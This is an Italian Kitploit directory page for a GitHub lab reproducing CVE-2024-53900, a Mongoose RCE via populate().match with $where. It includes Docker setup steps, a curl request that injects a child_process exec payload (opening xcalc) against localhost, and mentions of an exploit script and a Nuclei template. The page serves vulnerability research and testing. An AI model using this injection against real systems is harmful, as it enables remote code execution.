Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-53900 — Ambiente riproducibile e PoC per CVE-2024-53900, una RCE critica in Mongoose tramite populate().match $where. Include script di exploit automatizzato e template Nuclei per test di sicurezza. | Kitploit
Strumenti/GitHubGitHub/www-spam/cve-2024-53900
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubwww-spam/cve-2024-53900

CVE-2024-53900

Ambiente riproducibile e PoC per CVE-2024-53900, una RCE critica in Mongoose tramite populate().match $where. Include script di exploit automatizzato e template Nuclei per test di sicurezza.

Vedi Repository
0 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-53900 - Mongoose populate().match $where RCE

Questa repository fornisce un ambiente vulnerabile riproducibile e un PoC per CVE-2024-53900, una vulnerabilità critica di Remote Code Execution (RCE) in Mongoose < 8.8.3.


📌 Dettagli della vulnerabilità

  • CVE: CVE-2024-53900
  • Versioni affette: Mongoose < 8.8.3
  • Gravità: Critica (CVSS 9.1)
  • Vettore: populate().match combinato con $where
  • Impatto: Esecuzione arbitraria di JavaScript (RCE) nel contesto Node.js

Riferimenti:

  • Advisory GitHub
  • Commit di correzione

🛠️ Istruzioni di configurazione

1. Clona la repository

root@kitploit:~
git clone https://github.com/www-spam/CVE-2024-53900.git
cd CVE-2024-53900

2. Avvia l'ambiente (Docker Compose)

root@kitploit:~
docker-compose up -d

📌 PoC con GUI (Calcolatrice)

Per impostazione predefinita, l'app Node.js vulnerabile viene eseguita all'interno di Docker.
Tuttavia, le applicazioni GUI (come xcalc o gnome-calculator) non si avvieranno all'interno di un container.

👉 Se vuoi dimostrare la RCE aprendo una finestra della calcolatrice:

  1. Esegui MongoDB in Docker (come backend del database)

    root@kitploit:~
    docker run -d --name mongo -p 27017:27017 mongo:6
    
  2. Esegui l'app Node.js vulnerabile localmente

root@kitploit:~
   cd ~/cve-2024/app
   npm install
   node server.js
  • MongoDB viene eseguito sulla porta 27017
  • L'app Node.js vulnerabile viene eseguita sulla porta 5000

📂 Struttura delle directory

root@kitploit:~
/home/kali/cve-2024/
├── docker-compose.yml     # Configurazione ambiente
├── exploit.py             # Script di exploit automatizzato
├── CVE-2024-53900.yaml    # Template Nuclei
├── README.md              # Documentazione
├── app/                   # App Node.js vulnerabile
│   ├── Dockerfile
│   ├── package.json
│   ├── server.js
│   ├── models.js
│   └── views/
└── data/                  # Volume MongoDB

🚀 Exploit

Test manuale

root@kitploit:~
curl "http://localhost:5000/book/{OBJECT_ID}/detail?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('xcalc')"

PoC automatizzato

root@kitploit:~
python3 exploit.py --url http://localhost:5000

Con Nuclei

root@kitploit:~
nuclei \ -u http://localhost:5000/book/{{OBJECT_ID}/detail \ -t ~/.local/nuclei-templates/CVE-2024-53900.yaml \ -var pfield=author
image

🔒 Note sulla sicurezza

  • Solo per ricerca e test (non in produzione).
  • Payload limitato a operazioni sicure (ad es. creazione di file).
  • Completamente isolato tramite Docker.

✅ Ambiente testato

  • OS: Kali Linux
  • MongoDB: mongo:6
  • Node.js: 18
  • Mongoose: 8.5.0 (vulnerabile)
  • Express: 4.18.2

📸 Demo

Image
Scarica lo strumento